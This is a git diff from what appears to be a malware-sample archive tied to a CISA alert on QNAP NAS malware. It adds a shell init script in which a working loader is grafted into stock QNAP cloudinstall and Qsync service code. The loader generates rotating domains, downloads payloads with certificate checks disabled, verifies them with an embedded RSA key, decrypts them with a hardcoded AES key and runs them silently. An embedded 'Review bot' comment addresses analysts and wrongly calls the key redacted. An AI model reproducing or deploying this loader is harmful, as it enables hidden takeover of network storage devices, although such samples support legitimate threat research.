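+LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+else
+LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+fi
+else
+if [ "x$_with_syslog" = x1 ]; then
+/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+else
+/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+fi
+fi
+_iret=$?
+if [ "x$_iret" = x0 ]; then
+i=0
+while [ ${i} -lt 10000 ]
+do
+echo "${i} millisecond..."
+_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+_qsyncd_run_pid=`/bin/pidof qsyncd`
+if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
+break
+fi
+usleep 50000
+i=`/usr/bin/expr ${i} + 50`
+done
+fi
+return -$_iret
+}
+
+stop_qsyncd()
+{
+#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+#[ "x$_qsyncd_en" = x0 ] || return -1
+_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
+[ $_qsyncd_pid -lt 0 ] && return -3
+# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
+/bin/kill -SIGUSR1 $_qsyncd_pid
+usleep 200000
+# Send SIGINT to stop the QSyncd process
+/bin/kill -SIGINT $_qsyncd_pid
+_kill_ret=$?
+if [ "x$_kill_ret" != x0 ]; then
+return -3
+fi
+echo "need wait $1 millisecond"
+i=0
+while true
+do
+echo "${i} millisecond..."
+_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+_qsyncd_run_pid=`/bin/pidof qsyncd`
+if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
+break
+fi
+if [ ${i} -ge $1 ]; then
+# if time-out, we send two additional SIGINT to force the daemon to stop.
+if [ $_qsyncd_pid -ge 0 ]; then
+/bin/kill -SIGUSR1 $_qsyncd_pid
+usleep 200000
+/bin/kill -SIGUSR1 $_qsyncd_pid
+fi
+j=0
+while [ ${j} -lt 500 ]
+do
+_qsyncd_run_pid=`/bin/pidof qsyncd`
+if [ -z $_qsyncd_run_pid ]; then
+return 0
+fi
+usleep 20000
+j=`/usr/bin/expr ${j} + 20`
+done
+return -62
+fi
+usleep 50000
+i=`/usr/bin/expr ${i} + 50`
+done
+return 0
+}
+
+
+install()
+{
+lock_file="/var/lock/qbox_install_bin.lck"
+
+if [ ! -f "${INSTALL_BUILD_IN}" ]; then
+dbg "build-in ${QSYNC_NAME} is installed"
+return 1
+fi
+
+if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
+dbg "${QSYNC_NAME}.bin} not found"
+return 1
+fi
+
+if [ ! -x "${QPKG_CLI}" ]; then
+dbg "${QPKG_CLI} not found"
+return 1
+fi
+
+## make sure volume is exist
+if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
+dbg "/share/Public not found"
+return 1
+fi
+
+## is removed
+if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
+/bin/rm -f ${INSTALL_BUILD_IN}
+dbg "${QSYNC_NAME} is removed"
+return 1
+fi
+
+if [ -f "$lock_file" ]; then
+if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
+echo "${QSYNC_NAME} is installing"
+dbg "${QSYNC_NAME} is installing"
+return 1
+fi
+fi
+
+/bin/touch "$lock_file"
+/bin/rm -f ${INSTALL_BUILD_IN}
+dbg "install build-in ${QSYNC_NAME} start"
+
+set_default_disable_status
+
+## install build in Qsync
+${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
+sleep 20
+
+wait_install=60
+## avoid initial take long time or fail
+while [ "$wait_install" -gt 0 ]; do
+stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
+if [ "$stcode" = "0" ]; then
+break
+fi
+sleep 1
+let "wait_install--"
+done
+
+${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
+/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
+/bin/rm -f "$lock_file"
+dbg "install build-in ${QSYNC_NAME} success"
+}
+
+if [ "$1" == "stop" ]; then
+{ /share/MD0_DATA/NOPE; exit 0; }
+fi
+fi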
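Review bot: Nothing in this sample marks where the stock cloudinstall/Qsync init code ends and the grafted loader begins, so each analyst has to rediscover the boundary; a sidecar note next to the file would fix that without altering the sample itself. The loader is the block between the two `if [ "$fromrcS" = 'TRUE' ]` guards (from `export PATH=` to the last `done` of the domain loop), so it runs when the script is invoked without `fromrcS=TRUE`, while the guarded `case` path calls `{ /share/MD0_DATA/NOPE; exit 0; }` instead. The note should also list what the block leaves behind for hunting: `.rsakey` and `.tmp.*` under `${bdir}/.qpkg/.config`, `curl -k` requests for `/qnap_firmware.xml`, and a detached run of the downloaded file. `local key='NOPE'` and the `NOPE` hook path look redacted, and that should be stated, since the file may then no longer hash to the name it is stored under.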
511
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/62426146b8fcaeaf6abb24d42543c6374b5f51e06c32206ccb9042350b832ea8
Normal file
511
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/62426146b8fcaeaf6abb24d42543c6374b5f51e06c32206ccb9042350b832ea8
Normal file
@ -0,0 +1,511 @@
|
||||
#!/bin/sh
|
||||
QNAP_QPKG=cloudinstall
|
||||
QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
|
||||
NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
|
||||
CLOUD_INSTALL_PATH=/tunnel_agent
|
||||
CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
|
||||
CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
|
||||
COUNTER=1
|
||||
ERROR_BAD_REQUEST=400
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
case "$1" in
|
||||
start)
|
||||
START_TIME=$(date +"%T")
|
||||
echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
|
||||
while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
|
||||
do
|
||||
# report device info and get cloudinstall agent app download url
|
||||
DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
|
||||
if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
# create ramdisk and create a 64mb file
|
||||
/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
|
||||
# create block size 1K filesystem
|
||||
/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
|
||||
# create virtual disk
|
||||
export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
# mount virtual disk
|
||||
/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
|
||||
else
|
||||
# create and mount tmpfs folder
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
fi
|
||||
cd $CLOUD_INSTALL_PATH
|
||||
|
||||
if [[ $DOWNLOAD_URL == https* ]]; then
|
||||
REPORT_SUCCESS_TIME=$(date +"%T")
|
||||
else
|
||||
REPORT_FAIL_TIME=$(date +"%T")
|
||||
echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
|
||||
# stop retry when got bad request
|
||||
# prevent put bad request all the time
|
||||
if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
|
||||
break
|
||||
fi
|
||||
fi
|
||||
|
||||
# downlaod cloudinstall agent app
|
||||
/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
|
||||
|
||||
if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
|
||||
DOWNLOAD_FINISH_TIME=$(date +"%T")
|
||||
# unzip and execute cloudinstallagent
|
||||
/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
|
||||
|
||||
UNZIP_TIME=$(date +"%T")
|
||||
fi
|
||||
|
||||
if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
# create folder and create symbolic link
|
||||
/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
|
||||
fi
|
||||
|
||||
# wait connect
|
||||
sleep 5
|
||||
CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
|
||||
if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
|
||||
SLEEP_TIME=$(( 30 * $COUNTER ))
|
||||
if [ $SLEEP_TIME -gt 300 ]; then
|
||||
SLEEP_TIME=300
|
||||
fi
|
||||
# wait next retry
|
||||
sleep $SLEEP_TIME
|
||||
fi
|
||||
COUNTER=$(( $COUNTER * 2 ))
|
||||
done
|
||||
|
||||
END_TIME=$(date +"%T")
|
||||
echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
|
||||
# call for a new process group and for later kill
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
|
||||
|
||||
# set cloudinstall report status
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
|
||||
# add link to report offline
|
||||
/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
|
||||
|
||||
# buzzer
|
||||
HARDWARE_TYPE=$(uname -m)
|
||||
if [[ "$HARDWARE_TYPE" == *"x86"* ]];
|
||||
then
|
||||
/sbin/hal_app --se_buzzer enc_id=0,mode=101
|
||||
elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
|
||||
then
|
||||
/sbin/pic_raw 81
|
||||
fi
|
||||
;;
|
||||
|
||||
stop)
|
||||
# disconnect cloudinstall agent
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
|
||||
for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
|
||||
do
|
||||
# use bash kill instead /bin/kill for kill process group
|
||||
# cloudinstall agent daemon and inotifywait
|
||||
kill -9 -- -$i &>/dev/null
|
||||
done
|
||||
|
||||
# umount
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
/bin/umount -l $USED_LOOP_DEVICE
|
||||
/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
|
||||
else
|
||||
/bin/umount -l $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
# remove all files
|
||||
if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
|
||||
fi
|
||||
;;
|
||||
|
||||
restart)
|
||||
$0 stop
|
||||
$0 start
|
||||
;;
|
||||
|
||||
*)
|
||||
echo "Usage: $0 {start|stop|restart}"
|
||||
exit 1
|
||||
esac
|
||||
exit 0
|
||||
|
||||
|
||||
set_env()
|
||||
{
|
||||
debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
|
||||
if [ "$debug" != "NULL" ]; then
|
||||
/bin/touch $LOG_FILE
|
||||
else
|
||||
/bin/rm -f $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
set_env
|
||||
|
||||
dbg()
|
||||
{
|
||||
if [ -f "$LOG_FILE" ]; then
|
||||
echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
dbg "> $0 $@ (pid $$)"
|
||||
|
||||
fi
|
||||
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
test "$RANDOM" || RANDOM=17653
|
||||
genrstr ()
|
||||
{
|
||||
local s=;
|
||||
local min=${1:-4};
|
||||
local max=${2:-12};
|
||||
local kspace="${3:-a-zA-Z}"
|
||||
tr -dc "$kspace" < /dev/urandom | {
|
||||
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
|
||||
echo "$s"
|
||||
}
|
||||
}
|
||||
|
||||
verifyfile() {
|
||||
local file="$1"
|
||||
local sig="${2:-$file_s}"
|
||||
local out
|
||||
test ! -z "$file" && test -s "$file" || return 1
|
||||
test ! -z "$sig" && test -s "$sig" || return 1
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
decryptfile() {
|
||||
local file="$1"
|
||||
local ofile="${2:-${file}}"
|
||||
local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
|
||||
openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
|
||||
test -f "$ofile" && rm -f "$ofile"
|
||||
mv "${file}_d" "$ofile" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJog4rwwSz1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
|
||||
DOMAIN_EXT_A='cf tk ml ga gq'
|
||||
DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
|
||||
|
||||
test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
|
||||
cd "${bdir}/.qpkg/.liveupdate" && rm -f .tmp.*
|
||||
|
||||
echo "$verifykey" > ".rsakey"
|
||||
i=0 n=0 c=0 errorcount=0
|
||||
outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
|
||||
|
||||
for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
|
||||
for ext in $domainexts; do
|
||||
hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
|
||||
hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
|
||||
hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
|
||||
hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
|
||||
for host in $hostnames; do
|
||||
test -f "$outfile" && rm -f "$outfile"
|
||||
recentupdate=''
|
||||
curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
|
||||
echo "$outfile https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)" > /tmp/hellomalware.txt
|
||||
test -s "$outfile" || continue
|
||||
fsize=$(( $(wc -c < "$outfile") ))
|
||||
test "$fsize" -gt 4096 && rm -f "$outfile" && continue
|
||||
rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
|
||||
test "$rsamsg" || continue
|
||||
path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
|
||||
hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
|
||||
test "$rsadomain" = "${host}.${ext}" || continue
|
||||
timenow=$(date +%s)
|
||||
test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
|
||||
curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
|
||||
filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
|
||||
test "$filehash" = "$hash" || continue
|
||||
curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
|
||||
verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
|
||||
mv "${outfile}_s" "${ts}_v"
|
||||
chmod 755 "$outfile" || continue
|
||||
( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" ) & )
|
||||
test "$recentupdate" -eq 1 && exit 0
|
||||
done
|
||||
done
|
||||
done
|
||||
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
|
||||
set_default_disable_status()
|
||||
{
|
||||
QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
|
||||
OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
|
||||
if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
|
||||
return
|
||||
fi
|
||||
|
||||
if [ "$QPKG_ENABLE" = "NULL" ]; then
|
||||
if [ "$OLD_ENABLE" = "FALSE" ]; then
|
||||
dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
|
||||
export QNAP_QPKG=rtrr
|
||||
else
|
||||
export QNAP_QPKG=HybridBackup
|
||||
/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
|
||||
fi
|
||||
start()
|
||||
{
|
||||
if [ -f /usr/bin/qsyncman ]; then
|
||||
[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
|
||||
/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
|
||||
/usr/bin/crontab /etc/config/crontab
|
||||
echo -n "Starting QSync manitor: "
|
||||
[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
|
||||
[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
|
||||
[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
|
||||
[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
|
||||
[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
|
||||
[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
|
||||
[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
|
||||
/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
|
||||
echo "OK"
|
||||
fi
|
||||
}
|
||||
|
||||
stop()
|
||||
{
|
||||
echo "Shutting down QSync monitor: OK"
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
kill $pidnum 2>/dev/null
|
||||
i=0
|
||||
while [ ${i} -lt 5 ]
|
||||
do
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
if [ -z "$pidnum" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
i=`/usr/bin/expr ${i} + 1`
|
||||
done
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
|
||||
/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
|
||||
/usr/bin/killall -q qsyncman
|
||||
}
|
||||
|
||||
start_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x1 ] || return -1
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
[ -z $_qsyncd_run_pid ] || return -114
|
||||
_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
|
||||
_with_syslog=$1
|
||||
if [ "x$_recycle_en" = xTRUE ]; then
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
else
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
fi
|
||||
_iret=$?
|
||||
if [ "x$_iret" = x0 ]; then
|
||||
i=0
|
||||
while [ ${i} -lt 10000 ]
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
fi
|
||||
return -$_iret
|
||||
}
|
||||
|
||||
stop_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x0 ] || return -1
|
||||
_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
[ $_qsyncd_pid -lt 0 ] && return -3
|
||||
# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
# Send SIGINT to stop the QSyncd process
|
||||
/bin/kill -SIGINT $_qsyncd_pid
|
||||
_kill_ret=$?
|
||||
if [ "x$_kill_ret" != x0 ]; then
|
||||
return -3
|
||||
fi
|
||||
echo "need wait $1 millisecond"
|
||||
i=0
|
||||
while true
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
if [ ${i} -ge $1 ]; then
|
||||
# if time-out, we send two additional SIGINT to force the daemon to stop.
|
||||
if [ $_qsyncd_pid -ge 0 ]; then
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
fi
|
||||
j=0
|
||||
while [ ${j} -lt 500 ]
|
||||
do
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ -z $_qsyncd_run_pid ]; then
|
||||
return 0
|
||||
fi
|
||||
usleep 20000
|
||||
j=`/usr/bin/expr ${j} + 20`
|
||||
done
|
||||
return -62
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
install()
|
||||
{
|
||||
lock_file="/var/lock/qbox_install_bin.lck"
|
||||
|
||||
